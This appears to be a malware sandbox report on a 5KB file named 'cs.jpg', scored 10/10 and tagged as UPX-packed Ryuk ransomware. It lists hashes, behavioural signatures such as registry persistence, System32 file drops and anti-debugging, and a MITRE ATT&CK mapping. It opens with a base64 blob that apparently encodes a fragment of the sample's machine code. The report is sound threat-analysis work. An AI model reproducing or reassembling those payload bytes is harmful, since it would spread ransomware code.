ExUCBGgGAAAA6L4kAACDxAyLXaxTi32oiwODwwSJB4PHBFeLP1NmiwODwwKJB4PHBGaLA4PDAokHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBFuBwxQAAABfg8cEV4s/U2aLA4PDAokHg8cEigNDiQeDxwSKA0OJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEZosDg8MCiQeDxwRmiwODwwKJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwRmiwODwwKJB4PHBGaLA4PDAokHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEV4s/uRAAAACBxwgAAABTV1GLP4sDg8MEiQeDxwSLA4PDBIkHg8cEWV9bg8cEgcMIAAAASQ+F1P///1+DxwRbgcPgAAAAX4PHBOjaIgAAg8QEi134iV3Yi13YgTtQRQAAD4QKAAAAuAAAAADpvxkAAItd9Ild2Ill1ItF9FBoRAAAAOinIgAAg8QEi/hbUIldzIlF0IsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEZokHg8cCiwODwwRmiQeDxwKLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEM8D/FQCgABCQkDll1HQXaBwCAABoExUCBGgGAAAA6K8hAACDxAxQi13QU4t9zIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8MEiQeDxwSLA4PDBIkHg8cEiwODwwSJB4PHBIsDg8ME

Targets

    • Target

      cs.jpg

    • Size

      5KB

    • MD5

      51a645c8ec38c1c387184971fb25d415

    • SHA1

      25454269f892c41c4402ad2a0f6a6550b6073710

    • SHA256

      3fd4cc4c6b673b37461086049a37d29fa05cd0b3773471ac087ea5eabdd57141

    • SHA512

      d819b5d5dff059406f223c27cdffbbaff2a11053ee1ab2dbc95d54dd9ee9ecfd7038209216506eeb765f9234ef56b792dc130ddd29402db4f24bea1add0be43f

    Score
    10/10
    ryukpersistenceransomwareupx

    • Ryuk

      Ransomware distributed via existing botnets, often Trickbot or Emotet.

      ransomwareryuk

    • Blocklisted process makes network request

    • Sets service image path in registry

      persistence

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Drops file in System32 directory

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks